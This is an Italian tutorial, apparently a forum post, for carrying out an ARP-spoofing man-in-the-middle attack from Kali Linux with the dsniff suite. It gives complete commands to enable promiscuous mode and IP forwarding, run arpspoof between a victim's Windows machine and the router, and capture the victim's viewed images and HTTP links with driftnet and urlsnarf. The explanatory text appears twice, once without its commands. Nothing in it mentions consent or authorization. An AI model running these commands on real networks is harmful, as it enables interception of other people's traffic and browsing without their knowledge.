Ultima modifica:
L'ARP spoofing è un attacco MiTM che sfrutta la fiducia del protocollo ARP, essendo che non tiene conto di chi fa l'ARP reply, useremo la suite di Dsniff per fare il tutto, in particolare i tool:
Dsniff non è installato di default su Kali 2022.2/2022.1, perciò lo installiamolo noi:
Io uso Kali 1.1.0 ed è preinstallato.
1. Prima dell'attacco
Prima si eseguire il tutto, dobbiamo mettere la scheda di rete in promiscuos mode e effettuare un IP forwarding per evitare un DoS alla nostra macchina, per farlo scriviamo nella shell:
Ora andiamo su Windows apriamo il cmd e scriviamo
Segniamoci l'IP della macchina e del router,
2. Iniziamo l'attacco
Andiamo nel terminale e scriviamo:
In questo modo abbiamo lanciato l'attacco di ARP spoofing. Se non volete usare due shell usate il terminale terminator che ci permette di fare lo split delo schermo, avere due shell su un unico terminale.
2.1 Intercettare immagini e link
Adesso intercetteremo immagini e link grazie ai tool driftnet e urlsnarf, per le immagini la sintassi è la seguente:
Si aprirà una finestra dove verranno visualizzate le immagini dei siti che la vittima sta visitando:
Per urlsnarf la sintassi è la stessa:
Inizieranno a scorrere i link HTTP dei siti che la vittima sta guardando:
Dal parametro
Una volta finito dobbiamo stoppare l'IP forwarding in questo modo:
- arpspoof
- urlsnarf
- driftnet
Dsniff non è installato di default su Kali 2022.2/2022.1, perciò lo installiamolo noi:
Bash:
sudo apt install dsniff -y
1. Prima dell'attacco
Prima si eseguire il tutto, dobbiamo mettere la scheda di rete in promiscuos mode e effettuare un IP forwarding per evitare un DoS alla nostra macchina, per farlo scriviamo nella shell:
Bash:
ifconfig eth0 promisc
sysctl -w net.ipv4.ip_forward=1
arp -a
, l'output:
Codice:
C:\users\root>arp -a
Interfaccia: 192.168.1.86 --- 0xb
Indirizzo Internet Indirizzo fisico tipo
192.168.1.1 b8-d5-26-7c-43-5d dinamico
192.168.1.255 ff-ff-ff-ff-ff-ff statico
192.168.1.1 01-00-5e-00-00-16 statico
192.168.1.255 01-00-5e-00-00-fc statico
192.168.1.1 ff-ff-ff-ff-ff-ff statico
192.168.1.86
/192.168.1.1
2. Iniziamo l'attacco
Andiamo nel terminale e scriviamo:
Bash:
arpspoof -i eht0 -t 192.168.1.1 192.168.1.86 #shell 1
arpspoof -i eht0 -t 192.168.1.86 192.168.1.1 #shell 2
2.1 Intercettare immagini e link
Adesso intercetteremo immagini e link grazie ai tool driftnet e urlsnarf, per le immagini la sintassi è la seguente:
Bash:
driftnet -i eth0
Bash:
urlsnarf -i eth0
GET
si puo vedere il link, in questo caso è http://old.kali.org. Una volta finito dobbiamo stoppare l'IP forwarding in questo modo:
Bash:
sysctl -w net.ipv4.ip_forward=0